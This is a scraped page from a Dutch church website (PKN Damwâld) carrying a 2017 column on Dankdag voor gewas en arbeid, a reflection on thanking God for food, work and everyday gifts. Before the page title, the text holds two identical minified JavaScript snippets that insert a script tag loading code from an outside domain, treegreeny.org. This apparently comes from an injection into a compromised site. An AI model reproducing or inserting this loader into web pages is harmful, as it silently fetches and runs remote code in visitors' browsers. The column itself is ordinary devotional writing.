;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dankdag voor gewas en arbeid ... Wat betekent dat eigenlijk? - PKN Damwâld

Dankdag voor gewas en arbeid … Wat betekent dat eigenlijk?

Gepubliceerd op: maandag 23 oktober 2017

Er zijn mensen die hun handen vouwen en hun ogen sluiten voor ze gaan eten.
Ze bedanken God voor het eten dat op tafel staat en voor de zorg die Hij aan hen besteedt.
Danken voor het eten? Waarom zou ik?
Zonder God staat er toch ook eten op tafel… toch, kan ik ook werken… toch, krijg ik ook mijn geld… toch?
Zonder God gaat het leven gewoon door. Of niet soms?

Op 1 november is het dankdag voor gewas en arbeid. Vroeger was dankdag een dag om God te danken voor de oogst die daarvoor van het land was gehaald, daarom de toevoeging voor gewas en arbeid. Een gebruik onder de boeren zeg maar. Zij geloofden dat alleen God het was die alles liet groeien zodat het geoogst kon worden en verwerkt kon worden voor allerlei doeleinden. Een dag doordeweeks speciaal voor God om Hem alle eer te bewijzen.
Nu is het anders maar met dezelfde functie. Het is niet meer specifiek iets van de boeren om na de oogst deze dag te houden. Nee, nu is het een dag om God te danken voor alles wat Hij je heeft gegeven. Bedenk het eens wat je het afgelopen jaar allemaal voor goede dingen hebt meegemaakt of gekregen. Diploma’s van school, een nieuw broertje of zusje, een baan, rijbewijs, noem maar op. Maar ook voor alle “gewone” alledaagse zaken. Het eten wat er iedere dag weer is, de zon, de lucht om in te ademen en noem maar op.  Wat is het fijn om daar dan een dag in het jaar speciaal voor uit te trekken om de Bron van alle goeds voor de danken.
Het is mooi dat je daar God voor kunt danken, maar het is nog mooier als je op die dag nog ergens anders voor kunt danken. Heb jij die God al leren kennen? Misschien onder die ene preek of met dat gesprek van die christelijke jongen, of zomaar op straat dat je iemand tegenkwam die jouw vertelde van God. Wonderlijk als je Hem daardoor mag leren kennen. En fijn als je daar God voor mag danken.
Dankdag, een dag om God te danken voor alles wat Hij je heeft gegeven. Misschien ken je ook wel minder fijne dingen. Ga dan ook naar God toe en vraag wat Hij voor een bedoeling Hij hiermee heeft, leg alles maar in Gods hand. Dank Hem voor alles.
Ken je die God nog niet? Heb je Hem nog niet leren kennen als die Bron van alle goed? Ga dan maar naar Hem toe en vraag of Hij je wil omkeren naar Hem toe. Dan wordt het echt dankdag, dan danken we God om de grote en de kleine dingen die Hij ook dit jaar weer voor ons gedaan heeft.
Dankdag, nog een keer, een dag speciaal om God te danken. Gelooft dan in die God met diepst ontzag, want deze God overlaadt ons elke dag met Zijn gunstbewijzen. Alle goede dingen komen uit Hem. Zullen we dan op dankdag Hem danken?

Het is God die leven geeft, elke dag, ook aan u!

 

Bron/overgenomen van: www.gkvapeldoornzuid.nl
Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns